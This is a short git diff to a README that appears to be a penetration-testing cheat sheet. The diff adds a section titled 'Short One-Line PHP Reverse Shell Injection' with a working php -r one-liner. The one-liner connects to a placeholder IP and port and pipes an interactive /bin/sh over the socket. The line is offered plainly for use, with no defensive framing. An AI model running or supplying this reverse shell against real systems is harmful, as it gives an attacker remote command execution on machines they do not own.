diff --git a/README.md b/README.md index 8e87700..d9c1604 100644 --- a/README.md +++ b/README.md @@ -327,6 +327,13 @@ function printit ($string) { ?> ``` + +* Short One-Line PHP Reverse Shell Injection +``` +php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' +``` + + #### Built-in Tools | Program | Command |